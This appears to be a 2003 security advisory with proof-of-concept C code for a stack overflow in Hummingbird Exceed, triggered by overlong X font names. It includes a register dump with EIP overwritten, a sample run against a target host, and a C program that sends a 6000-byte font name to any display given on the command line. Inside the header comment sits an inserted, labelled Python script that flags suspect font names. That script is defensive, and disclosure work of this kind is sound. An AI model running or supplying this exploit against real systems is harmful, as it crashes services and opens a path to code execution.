/*****************************************************************************
$ An open security advisory #2 - Hummingbird Exceed (All Versions) POC Code
*****************************************************************************
1: Bug Researcher: c0ntex@hushmail.com
2: Bug Released: August 2003
3: Bug Impact Rate: Medium / High
4: Bug Scope Rate: Remote / Local
****************************************************************************
HQOTD: "How secure do you want it"
http://mimage.hummingbird.com/alt_content/binary/pdf/collateral/ds/exceed_ds_en.pdf
I'll tell you: Much more please sirs.
**************************************
Exceed has bugs in the way it handles font names, both locally and from remote clients.
When a client requests a font from an Exceed font database and the font name is either
longer than the fixed-size buffer that receives it, or has been prepared as hostile input,
a stack-based overflow occurs. This allows the execution of external commands on the
vulnerable system.
Obviously it is also possible to cause a denial of service (DoS) against a machine running
Exceed.
By sending an X terminal window, or any other X application, to Exceed with an overlong
font name or an overlong window title, we can corrupt the stack and crash Exceed.
Windows Stack Trace:
--------------------
EAX = C0000000
EBX = 00000000
ECX = 40000000
EDX = 00000501
ESI = 41414141
EDI = 0012E138
EIP = 41414141
ESP = 0012E0C8
EBP = 0012E0F0
[-] We can crash a local Exceed server * 2
[-] We can crash a remote Exceed server * many
[-] We can crash Exceed client * many
[-] We can write over EIP address * many
See the POC code below for more information.
Example Run:
------------
[c0ntex@darkside exceed]$ gcc -o exceed exceed.c -lX11 -L /usr/X11R6/lib
[c0ntex@darkside exceed]$ ./exceed exploited:0.0
[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com
[-] We are using DISPLAY variable: exploited:0.0
[-] Hang on to your feathers, sending some buffer
..
XIO: fatal IO error 104 (Connection reset by peer) on X server "exploited:0.0"
after 11 requests (9 known processed) with 0 events remaining.
Remote Font Server:
-------------------
If you use remote font servers with Exceed, one way to check that a server is not
serving a hostile font name to your PC is to list its fonts and look for abnormally
long entries:
$ xlsfonts -display exceed_server:0.0
--------0------
--arial-bold-r---0-0-120-120-p-0-iso8859-1
--arial-medium-r---0-0-120-120-p-0-iso8859-1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... <-- Here is the evil font
...
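To make that check repeatable, here is an added script (not part of the advisory or of Exceed) that parses `xlsfonts` output and flags font names that are overlong, contain non-printable bytes, or do not carry the 14 fields of an XLFD name; the 255-byte threshold and the sample listing are constructed assumptions.

```python
import subprocess

# Assumed threshold: real XLFD names are far shorter, the advisory's crashing name is ~6000 bytes
MAX_SAFE_NAME_LEN = 255
XLFD_FIELDS = 14  # an XLFD name is a leading '-' followed by 14 '-'-separated fields

# Constructed sample of xlsfonts output, modelled on the advisory's listing
SAMPLE_XLSFONTS_OUTPUT = (
    "-adobe-courier-medium-r-normal--12-120-75-75-m-70-iso8859-1\n"
    "--arial-bold-r---0-0-120-120-p-0-iso8859-1\n"
    "--arial-medium-r---0-0-120-120-p-0-iso8859-1\n"
    "fixed\n"
    + "A" * 6000 + "\n"  # the hostile entry
)


def classify_font_name(name):
    """Return None when a font name looks benign, else a short reason it is suspect."""
    if len(name) > MAX_SAFE_NAME_LEN:
        return "overlong name (%d bytes)" % len(name)
    if not all(" " <= c <= "~" for c in name):
        return "non-printable bytes in name"
    if name.startswith("-"):
        fields = name.split("-")[1:]
        if len(fields) != XLFD_FIELDS:
            return "malformed XLFD (%d fields, expected %d)" % (len(fields), XLFD_FIELDS)
    return None  # plain aliases such as "fixed" are left alone


def suspicious_fonts(listing):
    """Parse xlsfonts-style output; return [(truncated name, reason)] for suspect entries."""
    findings = []
    for line in listing.splitlines():
        name = line.strip()
        if not name:
            continue
        reason = classify_font_name(name)
        if reason is not None:
            shown = name if len(name) <= 40 else name[:40] + "..."
            findings.append((shown, reason))
    return findings


def audit_display(display):
    """Run xlsfonts against a display and audit the names it returns (needs xlsfonts installed)."""
    out = subprocess.run(["xlsfonts", "-display", display],
                         capture_output=True, text=True, check=True).stdout
    return suspicious_fonts(out)


if __name__ == "__main__":
    for shown, reason in suspicious_fonts(SAMPLE_XLSFONTS_OUTPUT):
        print("%-43s %s" % (shown, reason))
```

Run `audit_display("exceed_server:0.0")` from an X client to check a live font server instead of the embedded sample.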
******************************************************************************************************************
$ Hummingbird informed 3 weeks ago, still no reply.
$ Workaround: Uninstall Exceed until a patch has been released.
******************************************************************************************************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <X11/Xlib.h>
#include <X11/Xutil.h>

#define BIGBIRD 6001          /* size of the oversized font name buffer */
#define DIRTY_VAL 69          /* window x/y origin */
#define MAX_BORDER_LEN 3      /* window border width */
#define WIN_TIMER 5           /* unused in this PoC */
#define WIN_TITLE "simple PoC window - lets shoot birds"

typedef char Birds;

int main(int argc, char *argv[])
{
    Birds nests[BIGBIRD];            /* the overlong font name: BIGBIRD-1 bytes of 'A' */
    Birds *feathersN = NULL;         /* NULL makes XOpenDisplay read $DISPLAY */
    Birds *HABITAT = "DISPLAY";
    unsigned short chicks;
    unsigned short winW, winH, feathersW, feathersH;
    unsigned long locX, locY;
    unsigned long winBDR;
    Display *feathers;
    Window wingspan;
    XFontStruct *birdcull;

    fprintf(stderr, "\n\n[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com\n");

    if(argc < 2) {
        fprintf(stderr, "[-] Please set IP/Hostname for DISPLAY pointer!\n");
        fprintf(stderr, "[-] Usage: %s host:display\n", argv[0]);
        return EXIT_FAILURE;
    }

    if(setenv(HABITAT, argv[1], 1) < 0) { /* ;p */
        perror("setenv");
        return EXIT_FAILURE;
    }
    fprintf(stderr, "[-] Ok, using DISPLAY variable: %s\n", argv[1]);

    /* Build the font name: 6000 bytes of 'A' (0x41), which is what shows up
     * in ESI and EIP in the stack trace above. */
    memset(nests, 'A', BIGBIRD - 1);
    nests[BIGBIRD - 1] = '\0';

    if((feathers = XOpenDisplay(feathersN)) == NULL) {
        fprintf(stderr, "XOpenDisplay: cannot connect to %s\n", argv[1]);
        return EXIT_FAILURE;
    }

    chicks = DefaultScreen(feathers);
    winW = ((feathersW = DisplayWidth(feathers, chicks)) / 3);
    winH = ((feathersH = DisplayHeight(feathers, chicks)) / 3);
    locX = DIRTY_VAL; locY = DIRTY_VAL; winBDR = MAX_BORDER_LEN;

    /* A plain window so the server has a client to attach the request to */
    wingspan = XCreateSimpleWindow(feathers, RootWindow(feathers, chicks),
                                   locX, locY, winW, winH, winBDR,
                                   BlackPixel(feathers, chicks),
                                   WhitePixel(feathers, chicks));
    if(wingspan == None) {
        fprintf(stderr, "XCreateSimpleWindow failed\n");
        XCloseDisplay(feathers);
        return EXIT_FAILURE;
    }
    XStoreName(feathers, wingspan, WIN_TITLE);
    XMapWindow(feathers, wingspan);
    XFlush(feathers);

    fprintf(stderr, "[-] Hang on to your feathers, sending some buffer \n\n");

    /* The overlong font name is the request that overflows the server's buffer */
    if((birdcull = XLoadQueryFont(feathers, nests)) == NULL) {
        fprintf(stderr, "XLoadQueryFont: server returned no font\n");
        XCloseDisplay(feathers);
        return EXIT_FAILURE;
    }
    XFreeFont(feathers, birdcull);
    XCloseDisplay(feathers);
    return EXIT_SUCCESS;
}